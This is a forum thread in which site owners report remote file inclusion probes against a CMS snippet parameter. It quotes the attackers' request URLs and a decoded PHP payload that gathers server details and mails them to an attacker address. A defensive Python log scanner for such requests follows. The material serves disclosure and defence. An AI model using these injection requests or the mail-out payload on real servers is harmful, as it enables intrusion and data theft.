Basically any request except to your main index.php file gets redirected to /blackhole/index.php, which probably doesn’t even exist (or could be a single page that has a reproving or maybe just a silly "neener, neener, caught you!" type of message). Of course, it would also need to allow requests to images, css and js files.
-
- 2,877 Posts
[email protected] was fishing on my site!
WHOIS: 178.63.59.XXX - Hxxxxxx Online AG - DE - Germany
REQUEST: //assets/snippets/reflect/snippet.reflect.php?reflect_base=ht\tp://www.eurotechindia.org/portal/conf/1.txt??\?
CONTENT:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
<?
eval(base64_decode("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"));
?>
Decoding -
http://www.opinionatedgeek.com/dotnet/tools/base64decode/
CONTENT:
<?
$creator = base64_decode("Y3piZXJAeWFob28uY29t");
($safe_mode)?($safemode="ON"):($safemode="OFF");
$base="ht\tp://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$host = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname -a: $name\nIP: $ip\nHost: $host\n$pwds\n";
$from ="From: MODE_=".$safemode."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);
?>
Decoding $creator = "[email protected]"
He did receive an e-mail from me. But I was in charge of the content of that e-mail.
[ed. note: mrhaw last edited this post 12 years, 4 months ago.]
-
- 2,877 Posts
[email protected] (deleted by google at this time)
WHOIS: 203.81.175.XXX - MM (Myanmar) - Firefox
REQUEST: //assets/snippets/reflect/snippet.reflect.php?reflect_base=h\ttp://ygnutd.com/vnc/x/david.txt??
I always e-mail them:
1. How many sites do you hack per month?
2. Do you attack sites personally or just at random?
3. Are you aware that by the info I have gathered you could be traced by police!?
And hope for an answer. I haven't been lucky but others have got replies and had a dialogue.
[ed. note: mrhaw last edited this post 12 years, 3 months ago.]
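
A log check for the request pattern reported in the posts above (a script parameter such as `reflect_base` whose value is a remote URL), as an added example that is not part of the thread. The combined log format, the client addresses and the example.org hosts are constructed assumptions; only the script path and parameter name come from the posts.

```python
import re
from urllib.parse import parse_qsl, unquote

# Client address and request target from a combined-log-format line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with a remote scheme is the pattern in the thread.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def remote_url_params(target):
    """Return (path, [(param, value), ...]) for values that are remote URLs."""
    # Split by hand: urlsplit() would read the leading "//" seen in these
    # requests as a network location and lose the first path segment.
    path, _, query = target.partition("?")
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; catch double encoding
        if REMOTE_URL_RE.match(decoded):
            hits.append((name, decoded))
    return path, hits

def scan(lines):
    """Return (client, path, param, value) for every suspicious parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        path, hits = remote_url_params(target)
        findings.extend((client, path, name, value) for name, value in hits)
    return findings

# Constructed sample log lines (documentation addresses and example.org hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET //assets/snippets/reflect/'
    'snippet.reflect.php?reflect_base=http://files.example.org/1.txt?? HTTP/1.1" 200 12',
    '198.51.100.7 - - [01/Jan/2012:10:00:05 +0000] "GET /index.php?id=12&ref=home HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2012:10:01:00 +0000] "GET /assets/snippets/reflect/'
    'snippet.reflect.php?reflect_base=http%253A%252F%252Ffiles.example.org%252Fx.txt HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A legitimate parameter that carries a URL (a redirect target, for instance) will also match, so treat hits as a triage list rather than a verdict.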